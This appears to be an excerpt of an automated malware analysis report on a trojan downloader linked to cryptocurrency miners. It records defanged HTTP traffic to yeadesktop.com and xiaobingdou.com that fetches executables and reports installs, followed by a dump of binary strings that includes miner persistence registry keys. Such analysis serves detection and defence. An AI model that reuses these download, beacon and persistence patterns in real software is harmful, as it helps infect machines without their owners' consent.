ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript"

<<< skipped >>>

GET /get.aspx?url=hXXp://qtipr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:33 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MDhDNzg5MTZDNjhDRUVFNTg3NjVDMkZBMjVFNDU5NjUwQ0VDRDVGQUM1OTk0RTgzMDlGRTlFMjNFNDE4Q0RBQUUwQzFENkMzMTFDQjM1MDZGNzI2OEE4NTM2RTFGN0Y2MzBDNjk4OTI0MjFCNUVFRTAxNkU1QzU1MTM1NkRBRTREODdFMUUyNjIwMUQ5RjNFMDFCQTkwQzgxQzVENkREODAxQ0U0RDVENThGOTJFNjVERjhGNzU2RjU1NzFEQkI5 HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:41 GMT
Connection: close
Content-Length: 0


GET /upgrade/popwndup.exe HTTP/1.0
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: down.yeadesktop.com
Accept: */*
Connection: Keep-Alive


HTTP/1.1 404 Not Found
Date: Wed, 16 Aug 2017 14:40:24 GMT
Content-Type: text/html
Connection: close
Set-Cookie: __cfduid=db21d6478c6c23c4f7c97c4e25eec4eb91502894424; expires=Thu, 16-Aug-18 14:40:24 GMT; path=/; domain=.yeadesktop.com; HttpOnly
Server: cloudflare-nginx
CF-RAY: 38f526080237842a-KBP
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica,
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
. <h2>404 - ..................</h2>.. <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>....

<<< skipped >>>

GET /reportInstallaa.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRUQ3RDA0Q0U4N0I5Nzg0QUQyQTk3RTc2N0RDRThDRkY1OEE1MkIwNURFRjg2Nzc4RDI1NzIyRUNGMjM1MUZFMTM3MzcxQUVFODQ0RUIxM0Q2NDA5QTQ3RDkzRTI4NjdFNDNBNjcyMDY1NDc2QTQ5NTA4ODJEMDFDOEI1MkIxNDk2OTc0MEMyMjVCQkIzRTk1RjU5MDI1NUVBMDRDNzJBQzA5RDM5NUZCNjk1NEU2QjY4NkJFOTQ1NDU2NEFCRjA0NkI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:25 GMT
Connection: close
Content-Length: 0


GET /anzhuang.aspx?ODI2Rjk2ODA4RUE1RjcyRDc3MkZBNUZBNjhBRjJBRURBOTFGNTNDNDFBMEVDRDk0ODkwODc3NUMxMTJCQjU5QUZGNzNCMTM4QkUxRUQ1Qjg0NDNCMjA4RjcwM0M1QUNFQTcxMzA0MTAzREQ4OTEzQUFCNzM0Njk2MEZGMTcxNUI= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: xiaobingdou.com


HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:31 GMT
Connection: close
Content-Length: 0


GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525eef6db83f4-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript"

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:21 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:31 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f532648b1c-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]..

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:39 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /upgrade/9001.xml HTTP/1.1
Accept: */*
User-Agent: Agent341033
Host: config.yeadesktop.com
Cache-Control: no-cache
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT
Accept-Ranges: bytes
ETag: "556fbfe823bfd21:0"
Server: Microsoft-IIS/7.5
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Length: 173
#ws...................................................................
......................................................................
.................................HTTP/1.1 200 OK..Content-Type: text/x
ml..Last-Modified: Thu, 27 Apr 2017 07:00:09 GMT..Accept-Ranges: bytes
..ETag: "556fbfe823bfd21:0"..Server: Microsoft-IIS/7.5..Date: Wed, 16
Aug 2017 14:40:20 GMT..Content-Length: 173..#ws.......................
......................................................................
......................................................................
.......
....



GET /Histlst/popnew.xml HTTP/1.1

Host: config.yeadesktop.com
Cache-Control: no-cache
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 15 Aug 2017 05:31:25 GMT
Accept-Ranges: bytes
ETag: "3abf8fbc8715d31:0"
Server: Microsoft-IIS/7.5
Date: Wed, 16 Aug 2017 14:40:21 GMT
Content-Length: 10675
........................................................)hV(uI*[z%[x*~
m Nu)Kw)|})I.%[a.................)I.%[a)\B%[x%VX)hV(uI%KA*Z|)pu)Kv....
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
......................................................................
..................................................................

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:38 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

GET /offer/msiql.exe HTTP/1.1
Accept: */*
User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: down.yeadesktop.com
Cookie: __cfduid=d5306f411be5b94d33d9913bbc141529d1502894419


HTTP/1.1 403 Forbidden
Date: Wed, 16 Aug 2017 14:40:20 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=10
Expires: Wed, 16 Aug 2017 14:40:30 GMT
X-Frame-Options: SAMEORIGIN
Server: cloudflare-nginx
CF-RAY: 38f525f166b7842a-KBP
ce3..<!DOCTYPE html>.<!--[if lt IE 7]> <html class="no-
js ie6 oldie" lang="en-US"> <![endif]-->.<!--[if IE 7]>
<html class="no-js ie7 oldie" lang="en-US"> <![endif]--&g
t;.<!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-U
S"> <![endif]-->.<!--[if gt IE 8]><!--> <html
class="no-js" lang="en-US"> <!--<![endif]-->.<head>.
<title>Access denied | down.yeadesktop.com used Cloudflare to re
strict access</title>.<meta charset="UTF-8" />.<meta ht
tp-equiv="Content-Type" content="text/html; charset=UTF-8" />.<m
eta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1" />.<
meta name="robots" content="noindex, nofollow" />.<meta name="vi
ewport" content="width=device-width,initial-scale=1,maximum-scale=1" /
>.<link rel="stylesheet" id="cf_styles-css" href="/cdn-cgi/style
s/cf.errors.css" type="text/css" media="screen,projection" />.<!
--[if lt IE 9]><link rel="stylesheet" id='cf_styles-ie-css' href
="/cdn-cgi/styles/cf.errors.ie.css" type="text/css" media="screen,proj
ection" /><![endif]-->.<style type="text/css">body{marg
in:0;padding:0}</style>.<!--[if lte IE 9]><script type=
"text/javascript" src="/cdn-cgi/scripts/jquery.min.js"></script&
gt;<![endif]-->.<!--[if gte IE 10]><!--><script t
ype="text/javascript" src="/cdn-cgi/scripts/zepto.min.js"></scri
pt><!--<![endif]-->.<script type="text/javascript"

<<< skipped >>>

GET /get.aspx?url=hXXp://yeadesktopbr.com/ HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
Host: pop.yeaplayer.com


HTTP/1.1 500 Internal Server Error
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Wed, 16 Aug 2017 14:40:41 GMT
Connection: close
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>.. <style>.. body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} .. p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..
b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}.. H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }.. H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }.. pre {font-family:"Lucid
a Console";font-size: .9em}.. .marker {font-weight: bold; colo
r: black;text-decoration: none;}.. .version {color: gray;}..
.error {margin-bottom: 10px;}.. .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..
</style>.. </head>.. <body bgcolor="white">.
. <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>.. <h2&
gt; <i>Runtime Error</i> </h2></span>..
<font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">.. <b> Description: </b>An application
error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
by browsers running on the local server machine... <

<<< skipped >>>

The Trojan connects to the servers at the following location(s):

%original file name%.exe_3380:

.text
`.rdata
@.data
.gfids
@.tls
.rsrc
@.reloc
j.hPS8
9.uQAV
W9.tC
j.Yf;
_tcPVj@
.PjRW
inappropriate io control operation
not supported
operation canceled
operation in progress
operation not permitted
operation not supported
operation would block
protocol not supported
address family not supported
broken pipe
function not supported
%b %d %H : %M : %S %Y
%m / %d / %y
%I : %M : %S %p
%H : %M : %S
%d / %m / %y
0123456789-
InitOnceExecuteOnce
g:\sdk\poco-1.7.8-all\foundation\src\File_WIN32U.cpp
!_path.empty()
g:\sdk\poco-1.7.8-all\foundation\src\FileStream_WIN32.cpp
src\TemporaryFile.cpp
%Y-%m-%dT%H:%M:%S%z
%Y-%m-%dT%H:%M:%s%z
%w, %e %b %y %H:%M:%S %Z
%w, %e %b %Y %H:%M:%S %Z
%w, %d %b %Y %H:%M:%S %Z
%W, %e-%b-%y %H:%M:%S %Z
%W, %e %b %y %H:%M:%S %Z
%w %b %f %H:%M:%S %Y
%Y-%m-%d %H:%M:%S
?#/:; @&=
%<>{}|\"^`!*'()$,[]
bad or invalid port number
src\TextConverter.cpp
src\ThreadPool.cpp
src\TextIterator.cpp
windows-1250
Windows-1250
windows-1251
Windows-1251
windows-1252
Windows-1252
cannot allocate thread context key
cannot join thread
src\ErrorHandler.cpp
Error reading HTTP request header
No HTTP request header
HTTP request method invalid or too long
HTTP request URI invalid or too long
Invalid HTTP version string
Unsupported Media Type
HTTP Version not supported
Error reading HTTP response header
No HTTP response header
Invalid HTTP status code
HTTP reason string too long
Unterminated HTTP response line
HTTP/1.0
Cannot set the port number for an already connected session
hXXp://
src\HTTPSession.cpp
0.0.0.0
Invalid address length passed to IPAddress()
Invalid address length passed to SocketAddress()
unsupported IP address family
src\Socket.cpp
()[]/|\',;
src\HTTPHeaderStream.cpp
src\HTTPStream.cpp
src\HTTPFixedLengthStream.cpp
src\HTTPChunkedStream.cpp
src\SocketImpl.cpp
Operation would block
Operation now in progress
Operation already in progress
Socket operation attempted on non-socket
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported
255.255.255.255
src\IPAddressImpl.cpp
mask() is only supported for IPv4 addresses
src\HostEntry.cpp
Not a valid registry key
RegDeleteKeyExW
Cannot open registry key:
HKEY_CLASSES_ROOT
HKEY_CURRENT_CONFIG
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_PERFORMANCE_DATA
Not a valid root key
Local\{C15730E2-145C-4c5e-B005-3BC753F42475}-once-flag
hXXp://VVV.appinf.com/features/no-whitespace-in-element-content
hXXp://xml.org/sax/features/validation
hXXp://xml.org/sax/features/namespaces
hXXp://xml.org/sax/features/namespace-prefixes
hXXp://xml.org/sax/features/external-general-entities
hXXp://xml.org/sax/features/external-parameter-entities
hXXp://xml.org/sax/features/string-interning
hXXp://xml.org/sax/properties/declaration-handler
hXXp://xml.org/sax/properties/lexical-handler
hXXp://VVV.appinf.com/features/enable-partial-reads
xml=hXXp://VVV.w3.org/XML/1998/namespace
Data is specified for a node which does not support data
The implementation does not support the type of object requested
A parameter or an operation is not supported by the underlying object
hXXp://VVV.w3.org/XML/1998/namespace
hXXp://VVV.w3.org/xmlns/2000/
MaxPolicyElementKey
pExecutionResource
operator
operator ""
IND)ind)Visual C++ CRT: Not enough memory to complete call to strerror.
Operation not permitted
Inappropriate I/O control operation
Broken pipe
?#%X.y
%S#[k
src\RegularExpression.cpp
offset <= subject.length()
src\MemoryPool.cpp
POSIX named classes are supported only within a class
erroffset passed as NULL
POSIX collating elements are not supported
this version of PCRE is compiled without UTF support
PCRE does not support \L, \l, \N{name}, \U, or \u
support for \P, \p, and \X has not been compiled
this version of PCRE is not compiled with Unicode property support
\N is not supported in a class
Error text not found (please report)
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\Disk\Enum
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\Folders
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceClasses\{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\IDE
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Enum\SCSI
_http_version
.rmvb
.html
.jpeg
.divx
.mpeg
.moov
.opus
.webm
video/webm
file '%s' size is:(%d bytes)
HTTP/1.1
avhttp/2.9.9
https
Async open url '
G:\Code\vendor\inc\boost_1_61_0\boost/exception/detail/exception_ptr.hpp
Unsupported scheme '
', need call receive_header for continue receive the http header.
Http header:
Location url invalid, error message: '
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gpuminer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\gplyra
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gplyra
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cpuminer
_unlink: %s
Removing %s.
%s[%d]:%s
..\..\Src\Download\HttpDownload.cpp
FINISHED --%s--
Downloaded: %s bytes in %d files
No URLs found in %s.
Download quota (%s bytes) EXCEEDED!
%swget.ini
%s: WGETRC points to %s, which doesn't exist.
%s: Cannot read %s (%s).
%s: Error in %s at line %d.
%s: %s: Invalid boolean `%s', use `on' or `off'.
%s: Invalid --execute command `%s'
%s: %s: Invalid number `%s'.
%s: %s: Invalid boolean `%s', use always, on, off, or never.
%s: %s: Invalid byte value `%s'
%s: %s: Invalid header `%s'.
%s: %s: Invalid time period `%s'
PTF://
hXXp://%s
PTF://%s
Unsupported scheme
Bad port number
IPv6 addresses not supported
%s: %s
d\
index.html
*password*
%s: %s: Not enough memory.
d:d:d
utime(%s): %s
d-d-d d:d:d
Failed to _unlink symlink `%s': %s
..\..\Src\Download\DownLoadTask.cpp
Converting %s...
Converted %d files in %.2f seconds.
Cannot convert links in %s: %s
Unable to delete `%s': %s
%d-%d
.orig
%d; URL=%s
Cannot back up %s as %s: %s
/index.html
Get %.0f%% [%d/%d]
%7.2f %s
%s: %s.
%.2f %s
Error in proxy URL %s: Must be HTTP.
Error parsing proxy URL %s: %s.
%d redirections exceeded.
unlink: %s
%s.%d
http_proxy
ftp_proxy
Removing %s since it should be rejected.
HTTP/
Reusing connection to %s:%hu.
Referer: %s
POST data file missing: %s
Content-Type: application/x-www-form-urlencoded
Failed writing HTTP request: %s.
%s %s HTTP/1.0
User-Agent: %s
Host: %s%s%s%s
Accept: %s
%s%s%s%s%s%s%s%s%s%s
%s request sent, awaiting response...
Read error (%s) in headers.
- %s
http-equiv=
Location: %s%s
Refusing to truncate existing file `%s'.
(%s to go)
Warning: wildcards not supported in HTTP.
File `%s' already there, will not retrieve.
(try:-)
--%s-- %s
%s => `%s'
Cannot write to `%s' (%s).
http1!
http2!
ERROR: Redirection (%d) without location.
%s ERROR %d: %s.
Server file no newer than local file `%s' -- not retrieving.
%s (%s) - `%s' saved [%ld/%ld]
%d %s
%s (%s) - `%s' saved [%ld]
%s URL:%s [%ld/%ld] -> "%s" [%d]
%s (%s) - Connection closed at byte %ld.
%s URL:%s [%ld] -> "%s" [%d]
%s (%s) - `%s' saved [%ld/%ld])
%s (%s) - Read error at byte %ld (%s).
%s (%s) - Connection closed at byte %ld/%ld.
%a, %d %b %Y %T
%s (%s) - Read error at byte %ld/%ld (%s).
%a, %d-%b-%Y %T
%A, %d-%b-%y %T
%s:%s
%a %b %d %T %Y
%s: Basic %s
username="%s", realm="%s", nonce="%s", uri="%s", response="%s"
Syntax error in Set-Cookie: %s at position %d.
Error in Set-Cookie, field `%s'
Cookie coming from %s attempted to set domain to %s
Cannot open cookies file `%s': %s
# Generated by Wget on %s.
# HTTP cookie file.
Error writing to `%s': %s
Error closing `%s': %s
Wget %s%s
%s%s.HLP
Wget [%.0f%%] %s
Starting WinHelp %s
SetThreadExecutionState
kernel32.dll
%Y-%m-%d
%a %b %e %H:%M:%S %Y
%m/%d/%y
%I:%M:%S %p
%H:%M:%S
%*s[ skipping %dK ]
=%%
Invalid dot style specification `%s'; leaving unchanged.
-%%
%7.2f%s
ETA %d:d:d
ETA d:d
http-equiv
%s: Cannot resolve incomplete link %s.
%s: Invalid URL %s: %s
Found %s in g_host_name_addresses_map (%p)
failed: %s.
Resolving %s...
Connecting to %s[%s]:%hu...
Unable to convert `%s' to a bind address. Reverting to ANY.
Connecting to %s:%hu...
Logging in as %s ...
%s@%s
The server refuses login.
Login incorrect.
==> TYPE %c ...
Unknown type `%c', closing control connection.
==> CWD %s ...
No such directory `%s'.
==> SIZE %s ...
couldn't connect to %s:%hu: %s
==> PORT ...
socket: %s
Bind error (%s).
Invalid PORT.
REST failed; will not truncate `%s'.
==> RETR %s ...
No such file `%s'.
No such file or directory `%s'.
accept: %s
[%s to go]
Length: %s
%s (%s) - Data connection: %s;
%s: %s, closing control connection.
%s (%s) -
File `%s' already there, not retrieving.
%s URL: %s [%ld] -> "%s" [%d]
.listing
Removed `%s'.
Skipping directory `%s'.
Remote file no newer than local file `%s' -- not retrieving.
Symlinks not supported, skipping symlink `%s'.
%s: corrupt time-stamp.
Remote file is newer than local file `%s' -- retrieving.
%s: unknown/unsupported file type.
%s/%s
Not descending to `%s' as it is excluded/not-included.
Rejecting `%s'.
No matches on pattern `%s'.
Wrote HTML-ized index to `%s'.
Wrote HTML-ized index to `%s' [%ld].
Cannot open %s: %s
Loading robots.txt; please ignore errors.
/robots.txt
.netrc
password
login
%s: %s:%d: warning: "%s" token appears before any machine name
%s: %s:%d: unknown token "%s"
%s%s%s
--> PASS Turtle Power!
--> %s
331 opiekey
331 s/key
PORT
%d,%d,%d,%d,%d,%d
WINDOWS_NT
Unsupported listing type, trying Unix listing parser.
%s%s%s@
Index of /%s on %s:%d
%d %s d
d:d
<a href="PTF://%s%s:%hu
(%s bytes)
-> %s
